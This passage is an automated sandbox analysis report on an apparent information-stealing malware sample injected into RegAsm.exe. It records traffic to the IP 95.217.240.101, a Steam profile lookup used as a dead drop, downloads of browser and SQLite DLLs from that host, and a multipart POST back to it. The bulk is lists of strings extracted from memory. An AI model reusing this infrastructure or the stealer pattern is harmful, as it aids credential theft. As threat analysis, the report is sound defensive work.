                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040514C _EH_prolog,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199686524322 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /sqlx.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIEGHJJDGHCAKEBGIJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 278Connection: Keep-AliveCache-Control: no-cache
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0N
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://store.st
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                  Source: RegAsm.exe, 00000002.00000002.2647482481.000000001B6CD000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                  Source: 76561199686524322[1].htm.2.drString found in binary or memory: https://95.217.240.101
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/D
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/O
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/freebl3.dll
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/freebl3.dllwT=
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/mozglue.dll
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/msvcp140.dllsS9
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/msvcp140.dllyS#
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/nss3.dll
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/softokn3.dll
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/softokn3.dlleS
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/sqlx.dll
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/sqlx.dllI
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/vcruntime140.dll
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101IDH
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101KEG
                  Source: HIEBAK.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: 76561199686524322[1].htm.2.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                  Source: HIEBAK.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: HIEBAK.2.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: HIEBAK.2.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=5CgcHEsWGAFt&a
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=soQOTmUz
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=6MtR
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=L3Ed_Gybseku&l=e
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                  Source: 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                  Source: HIEBAK.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: HIEBAK.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: HIEBAK.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://help.steampowered.com/en/
                  Source: GCGDGH.2.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: https://mozilla.org0/
                  Source: 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/discussions/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                  Source: 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199686524322
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/market/
